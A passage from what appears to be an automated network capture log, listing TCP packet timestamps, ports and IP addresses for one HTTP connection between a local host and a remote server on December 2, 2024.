                                                                                                                                                                                                        Dec 2, 2024 07:37:55.189646006 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.189769030 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.189800978 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.193331003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.193382978 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.193423033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.196779966 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.196835041 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.196878910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.200474977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.200571060 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.200666904 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.204021931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.204098940 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.204123974 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.207559109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.207622051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.207716942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.210946083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.210985899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.211148977 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.214348078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.214401007 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.214493990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.217896938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.218014002 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.218020916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.221111059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.221153021 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.221208096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.224519968 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.224560976 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.224692106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.227915049 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.228007078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.228179932 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.231287003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.231328964 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.231375933 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.234661102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.234783888 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.234792948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.238073111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.238126993 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.238181114 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.241477013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.241529942 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.241530895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.244868040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.244931936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.244987965 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.248250961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.248327971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.248347998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.251648903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.251775026 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.251789093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.255050898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.255093098 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.255168915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.258491993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.258557081 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.258574009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.261797905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.261868000 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.261919975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.265221119 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.265291929 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.265315056 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.268600941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.268652916 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.268786907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.272001028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.272066116 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.272113085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.275456905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.275525093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.275546074 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.278765917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.278821945 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.278875113 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.282175064 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.282207966 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.282227039 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.285600901 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.285655022 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.285669088 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.288980961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.289031982 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.289108038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.292355061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.292417049 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.292454958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.295758963 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.295805931 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.295869112 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.299161911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.299190044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.299241066 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.340662003 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.363245964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.363285065 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.363377094 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.364097118 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.364212990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.364276886 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.367130995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.367202044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.367260933 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.369432926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.369560957 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.369637012 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.372422934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.372535944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.372606993 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.375416994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.389055967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.389136076 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.389210939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.390300989 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.390384912 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.390388012 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.392699003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.392754078 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.392805099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.395159960 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.395215034 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.395309925 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.397646904 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.397706032 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.397783041 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.400042057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.400109053 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.400177002 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.402491093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.402538061 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.402631044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.404877901 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.404937029 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.404973030 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.407213926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.407265902 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.407334089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.409579992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.409635067 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.409648895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.411843061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.411947012 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.411950111 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.414108992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.414153099 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.414186001 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.415479898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.415530920 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.415570974 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.416874886 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.416887999 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.416927099 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.418248892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.418319941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.418384075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.419662952 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.419742107 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.419776917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.421190977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.421241045 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.421318054 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.422411919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.422472954 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.422518969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.423810005 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.423867941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.423907042 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.425203085 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.425259113 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.425329924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.426623106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.426656961 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.426661968 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.427984953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.428042889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.428085089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.429527998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.429574013 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.429608107 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.430769920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.430819035 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.430859089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.432123899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.432179928 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.432221889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.433521986 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.433568954 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.433640003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.434940100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.434994936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.435050964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.436307907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.436368942 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.436409950 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.437747955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.437834024 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.437848091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.439073086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.439152956 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.439176083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.440464020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.440566063 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.440593004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.441874027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.441936016 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.442018032 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.443285942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.443300009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.443332911 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.444659948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.444719076 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.444751978 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.446005106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.446047068 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.446108103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.447396994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.447449923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.447490931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.448786974 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.448837042 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.448885918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.450175047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.450234890 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.450277090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.451580048 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.451636076 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.451658010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.452935934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.453000069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.453026056 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.454382896 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.454427958 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.454607964 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.455750942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.455810070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.455820084 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.457102060 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.457174063 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.457209110 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.458477020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.458502054 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.458564997 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.459908009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.459950924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.460014105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.461272955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.461347103 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.461391926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.462742090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.462795973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.462800980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.464016914 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.464070082 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.564544916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.564667940 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.564740896 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.565228939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.565315962 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.565368891 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.566519022 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.566627026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.566680908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.567790985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.590202093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.590279102 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.590403080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.590809107 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.590856075 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.590943098 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.591069937 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.591155052 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.592072010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.592107058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.592163086 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.593132973 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.593261003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.593341112 CET4971980192.168.2.8185.215.113.16
